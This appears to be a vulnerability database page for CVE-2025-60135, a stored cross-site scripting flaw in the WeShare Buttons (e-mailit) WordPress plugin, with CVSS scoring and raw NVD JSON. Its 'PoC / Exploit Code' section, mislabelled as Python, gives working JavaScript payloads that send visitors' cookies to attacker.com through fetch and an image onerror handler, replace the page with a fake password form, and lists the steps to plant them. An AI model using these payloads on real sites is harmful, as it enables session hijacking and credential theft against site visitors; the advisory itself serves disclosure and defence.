Security Vulnerability Report
中文
CVE-2025-60135 CVSS 5.9 MEDIUM

CVE-2025-60135

Published: 2025-10-22 15:15:57
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NIKITAS GEORGOPOULOS WeShare Buttons e-mailit allows Stored XSS.This issue affects WeShare Buttons: from n/a through <= 13.0.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WeShare Buttons (e-mailit) <= 13.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-60135 --> <!-- Attack Vector: Inject malicious script through WeShare Buttons settings --> <!-- This PoC demonstrates the XSS payload that gets stored and executed --> <!-- Basic XSS Payload --> <script>alert('XSS - CVE-2025-60135')</script> <!-- Cookie Stealing Payload --> <script> var stolen_cookie = document.cookie; fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(stolen_cookie)); </script> <!-- Session Hijacking Payload --> <img src=x onerror="this.src='https://attacker.com/log?data='+document.cookie"> <!-- DOM Manipulation Payload --> <script> document.body.innerHTML = '<h1>Phishing Page</h1><form action="https://attacker.com/phish">Password: <input name="pwd"></form>'; </script> <!-- Attack Execution Steps: 1. Attacker with admin privileges accesses WordPress admin panel 2. Navigate to WeShare Buttons plugin settings 3. Inject XSS payload in share button text/title fields 4. Save settings - payload is stored in database 5. Any user visiting page with share buttons triggers the XSS 6. Malicious script executes in victim's browser context -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60135", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:57.173", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NIKITAS GEORGOPOULOS WeShare Buttons e-mailit allows Stored XSS.This issue affects WeShare Buttons: from n/a through <= 13.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/e-mailit/vulnerability/wordpress-weshare-buttons-plugin-13-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}